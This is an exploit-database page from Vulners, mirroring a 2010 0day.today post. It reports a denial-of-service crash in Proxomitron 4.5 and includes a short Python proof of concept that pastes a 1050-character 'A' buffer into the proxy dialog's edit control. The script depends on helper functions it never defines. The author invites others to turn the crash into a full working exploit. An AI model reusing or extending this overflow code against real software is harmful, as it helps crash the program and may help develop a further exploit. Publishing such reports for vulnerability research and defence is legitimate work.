Lucene search
K

Proxomitron 4.5 Denial of Service attack

🗓️ 30 Mar 2010 00:00:00Reported by Richard leahyType 
zdt
 zdt
🔗 0day.today👁 21 Views

Proxomitron 4.5 Denial of Service exploit in edit contro

Code
========================================
Proxomitron 4.5 Denial of Service attack
========================================

I have managed to find a dos exploit in proxomitron 4.5. I have tried to exploit this further into a full working exploit but not had success as of yet. Will be happy for others to see if they can try and take this further and post feed back to me. To test this open up proxomiton, click the proxy button add the string into the edit control and click test or ok. seems to have different effects if you click the add button and add a longer string to the enter new proxy server dalog.

kind regards

richard leahy



import os,sys,subprocess,time,struct,array,ctypes,win32con,win32gui,win32api

mybuffer = "A" * 1050

mainDialog = findTopWindow(wantedText='External Proxy Selector')

findValue = findControl(mainDialog, wantedClass="Edit")

setEditText(findValue, mybuffer) 



#  0day.today [2018-02-15]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Mar 2010 00:00Current
7High risk
Vulners AI Score7
21